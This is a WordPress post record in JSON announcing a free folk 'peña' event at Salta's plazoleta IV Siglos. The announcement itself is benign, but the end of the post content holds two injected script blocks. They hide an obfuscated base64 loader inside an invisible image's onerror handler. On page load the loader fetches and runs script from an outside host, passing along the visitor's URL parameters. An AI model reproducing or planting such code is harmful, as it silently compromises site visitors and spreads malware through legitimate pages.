{"id":4811,"date":"2025-02-07T09:36:01","date_gmt":"2025-02-07T12:36:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4811"},"modified":"2025-08-13T23:41:09","modified_gmt":"2025-08-14T02:41:09","slug":"hoy-llega-una-nueva-edicion-de-la-ciudad-de-las-penas-en-plazoleta-iv-siglos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4811","title":{"rendered":"Hoy llega una nueva edici\u00f3n de \u00abLa Ciudad de las Pe\u00f1as\u00bb en plazoleta IV Siglos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8ce911b448cdeee5a8dd06601f803543\" style=\"background-color:#0570ae\"><strong><em>Este viernes 7 de febrero, desde las 19 hs, la Pe\u00f1a Huayra ser\u00e1 la protagonista y ofrecer\u00e1 un espect\u00e1culo para todo p\u00fablico. La entrada es libre y gratuita.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta a trav\u00e9s del Ente de Turismo celebrar\u00e1 una nueva jornada de \u201cLa Ciudad de las Pe\u00f1as\u201d, este viernes en la plazoleta IV Siglos.&nbsp;<\/p>\n\n\n\n<p>La cita ser\u00e1 a partir de las 19 horas se presentar\u00e1 \u201cPe\u00f1a Huayra\u201d, con un espect\u00e1culo abierto a todo el p\u00fablico.<\/p>\n\n\n\n<p>En esta ocasi\u00f3n, la cantora y pe\u00f1era Reina C\u00e1ceres ser\u00e1 una de las protagonistas que deleitar\u00e1 al p\u00fablico presente con sus canciones y su canto.&nbsp;<\/p>\n\n\n\n<p>La propuesta forma parte de un ciclo que busca revalorizar las pe\u00f1as como parte del atractivo tur\u00edstico de la ciudad.<\/p>\n\n\n\n<p>Desde el Ente extienden la invitaci\u00f3n a turistas y a la comunidad local para descubrir el verano en Salta y disfrutar de m\u00fasica y danzas folcl\u00f3ricas.&nbsp;<\/p>\n\n\n\n<p>Se recuerda que todos los viernes de verano, la plazoleta IV Siglos es el escenario de intervenciones culturales protagonizadas por diferentes pe\u00f1as de la ciudad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2025\/02\/img-1241-jpg.webp\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/manana-llega-una-nueva-edicion-de-la-ciudad-de-las-penas-en-plazoleta-iv-siglos\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/03\/logo-salta-2024-jpg.webp\" alt=\"\" style=\"width:245px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este viernes 7 de febrero, desde las 19 hs, la Pe\u00f1a Huayra ser\u00e1 la protagonista y ofrecer\u00e1 un espect\u00e1culo para todo p\u00fablico. La entrada es libre y gratuita. La Municipalidad de Salta a trav\u00e9s del Ente de Turismo celebrar\u00e1 una nueva jornada de \u201cLa Ciudad de las Pe\u00f1as\u201d, este viernes en la plazoleta IV Siglos.&nbsp; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4812,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4811","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4811"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4811"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4811\/revisions"}],"predecessor-version":[{"id":6578,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4811\/revisions\/6578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4812"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4811"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4811"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4811"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}